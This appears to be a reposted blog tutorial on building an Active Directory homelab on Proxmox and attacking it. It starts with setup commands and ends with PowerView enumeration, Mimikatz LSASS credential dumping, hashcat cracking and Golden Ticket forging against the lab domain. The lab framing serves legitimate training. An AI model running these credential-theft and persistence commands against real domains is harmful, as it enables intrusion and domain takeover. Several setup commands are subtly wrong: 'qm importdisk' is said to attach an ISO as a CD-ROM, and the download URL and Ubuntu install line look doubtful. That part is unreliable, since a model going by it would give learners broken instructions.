Listen to this Post
Introduction:
Building a professional-grade Active Directory (AD) homelab is no longer a luxury reserved for large corporations; it is an essential, hands-on training ground for cybersecurity professionals. By virtualizing a controlled network environment with domain controllers, servers, and workstations, practitioners can safely emulate, attack, and defend against real-world threats, transforming theoretical knowledge into practical, muscle-memory skill. This guide provides the technical roadmap to construct your own cyber range using Proxmox, enabling deep, foundational learning of AD security that is often overlooked in standardized penetration testing challenges.
Learning Objectives:
- Design and deploy a fully functional, isolated Active Directory domain for security testing.
- Master core Windows Server and Linux administration commands essential for configuration and hardening.
- Execute and mitigate common AD attack vectors, from initial enumeration to full domain compromise.
You Should Know:
1. Virtualization Foundation with Proxmox
The entire homelab is built on Proxmox Virtual Environment (VE), a powerful, open-source server virtualization platform. The first step is installing the hypervisor on your physical hardware.
`wget https://enterprise.proxmox.com/iso/proxmox-ve_8.1-1.iso` – Downloads the latest Proxmox VE installation ISO.
`dd if=proxmox-ve_8.1-1.iso of=/dev/sdX bs=4M status=progress && sync` – Creates a bootable USB drive on a Linux system.
After burning the ISO to a USB drive, boot your physical machine from it. The Proxmox installer provides a straightforward graphical interface. Follow the prompts, configuring your disk partitioning, setting a strong root password for the Proxmox web interface, and defining a static IP address for the management interface (e.g., 192.168.1.10/24). Once installed, you will manage your entire lab via the web-based management GUI at `https://[YOUR-IP]:8006`.
2. Core Virtual Machine Creation
With Proxmox operational, the next phase is creating template virtual machines (VMs) for Windows and Linux to be cloned later.
`qm create 9000 –name “win10-template” –memory 4096 –cores 2 –net0 virtio,bridge=vmbr0` – Proxmox CLI command to create a new VM with ID 9000, 4GB RAM, and 2 CPU cores.
`qm importdisk 9000 win10-iso.iso local-lvm` – Attaches a Windows 10 ISO to the VM as a CD-ROM drive.
Within the Proxmox GUI, complete the OS installation on your template VMs. For Windows, use evaluation copies available from Microsoft. For a Linux machine like a vulnerable web server, use a minimal Ubuntu Server install: subiquity --automation config.yaml. After installation, install the `qemu-guest-agent` on Linux (sudo apt install qemu-guest-agent) and Windows (via the `virtio-win` driver ISO) to enable proper host-VM communication. Finally, run `sysprep` on Windows or `sudo apt clean && sudo truncate -s 0 /etc/machine-id` on Linux to generalize the image before converting it to a template.
3. Active Directory Domain Services Deployment
The heart of the lab is the Domain Controller (DC). Promote a Windows Server 2022 VM to a DC using PowerShell.
`Install-WindowsFeature -Name AD-Domain-Services -IncludeManagementTools` – Installs the AD DS server role.
`Install-ADDSForest -DomainName “lab.local” -DomainNetbiosName “LAB” -InstallDns:$true -SafeModeAdministratorPassword (ConvertTo-SecureString “P@ssw0rd!” -AsPlainText -Force) -Force:$true` – Promotes the server to a DC and creates a new forest.
This single command creates the `lab.local` domain. After the mandatory reboot, log in with the domain administrator account. Verify the installation by opening `Active Directory Users and Computers` (dsa.msc) and confirming the built-in containers exist. Configure the DHCP server role on the DC to manage IP addressing for your lab VMs, ensuring they automatically receive DNS settings pointing to the DC to facilitate proper domain joining.
4. Domain Joining and Organizational Unit (OU) Structure
A well-structured AD is crucial for testing. Create OUs and join client machines to the domain.
`Add-Computer -DomainName “lab.local” -Credential LAB\Administrator -Restart -Force` – PowerShell command on a client workstation to join it to the domain.
`New-ADOrganizationalUnit -Name “Servers” -Path “DC=lab,DC=local” -ProtectedFromAccidentalDeletion $false` – Creates a new OU for server objects.
Create a logical OU structure (e.g., Servers, Workstations, Users, Admins) using the `Active Directory Administrative Center` or PowerShell. Use Group Policy Objects (GPOs) linked to these OUs to enforce security baselines. For example, create a GPO linked to the “Workstations” OU to disable Windows Firewall for testing purposes. This structured environment allows for precise testing of GPO abuse and lateral movement techniques.
5. Essential Enumeration with PowerView
Once the lab is built, begin offensive testing. Reconnaissance is the first step, and PowerView is the classic tool for AD enumeration.
`Get-NetDomain` – Retrieves basic information about the current domain.
`Get-NetUser | Select-Object samaccountname, description, lastlogon` – Enumerates all domain users and key properties.
`Get-NetComputer -OperatingSystem “Server” | Select-Object name, operatingsystem` – Finds all computers running a server OS.
Import PowerView into your PowerShell session: Import-Module .\PowerView.ps1. These commands help an attacker map the domain structure, identify high-value users (e.g., Domain Admins), and locate potential target servers. Run these from a standard user-context workstation to understand what information is readily available in a default AD configuration, highlighting common information disclosure misconfigurations.
6. Credential Dumping with Mimikatz
Mimikatz is the quintessential tool for extracting credentials from memory, demonstrating the critical attack of credential theft.
`privilege::debug` – Attempts to enable the SeDebugPrivilege, required for accessing other processes’ memory.
`sekurlsa::logonpasswords` – Dumps passwords, hashes, and Kerberos tickets from the Local Security Authority Subsystem Service (LSASS) memory.
On your Windows server, ensure you have appropriate permissions (e.g., Local Administrator rights). Mimikatz will output NTLM password hashes for logged-on users. These hashes can be used for Pass-the-Hash attacks or cracked offline with tools like Hashcat: hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt. This exercise underscores the critical importance of credential hygiene and the need for protections like Windows Defender Credential Guard.
7. Persisting with Golden Tickets
A Golden Ticket attack allows for persistent, stealthy access to the domain by forging Kerberos Ticket-Granting Tickets (TGTs).
`lsadump::lsa /patch` – (In Mimikatz) Extracts the KRBTGT account’s NTLM hash from the DC.
`kerberos::golden /User:GenericUser /domain:lab.local /sid:S-1-5-21-… /krbtgt:KRBTGT_NTLM_HASH /id:500 /ptt` – Forges a Golden Ticket and injects it into the current session.
This attack requires compromise of the KRBTGT account’s password hash, which is why rotating this account’s password twice is the standard remediation after a suspected domain compromise. After running the `kerberos::golden` command, use `dir \\dc.lab.local\c$` to prove that you now have domain administrative access without knowing any administrator passwords, demonstrating the absolute trust placed in the Kerberos protocol and the KRBTGT key.
What Undercode Say:
- The hands-on process of building and breaking an AD environment provides irreplaceable, foundational context that drastically accelerates an offensive security learning curve.
- A homelab is not a one-time project but a living environment for continuous testing, allowing for the safe practice of novel exploits and complex attack chains before they are encountered in professional engagements.
The professional value of a self-built homelab cannot be overstated. While curated penetration testing labs like HackTheBox teach valuable exploitation skills, they often abstract away the underlying misconfigurations and architectural nuances that lead to vulnerability. Building the domain from the ground up forces a defender’s mindset, revealing why certain settings are dangerous and how attackers discover them. This deep, systems-level understanding is what separates competent technicians from expert architects. The ability to quickly revert a compromised network to a known-good state with a Proxmox snapshot encourages aggressive and creative testing, fostering a truly experimental and mastery-oriented learning environment.
Prediction:
The accessibility of powerful, cheap hardware and open-source virtualization software will democratize advanced cybersecurity training, leading to a new generation of practitioners with deeply internalized, systems-level knowledge. This grassroots upskilling will force enterprises to adopt more sophisticated defensive postures as common attack techniques become widely understood. Furthermore, the rise of AI-powered penetration testing tools will be trained and tested within these isolated homelabs first, accelerating their development and refinement before they are integrated into commercial security products, ultimately raising the bar for both attackers and defenders.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Noahfarmer When – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
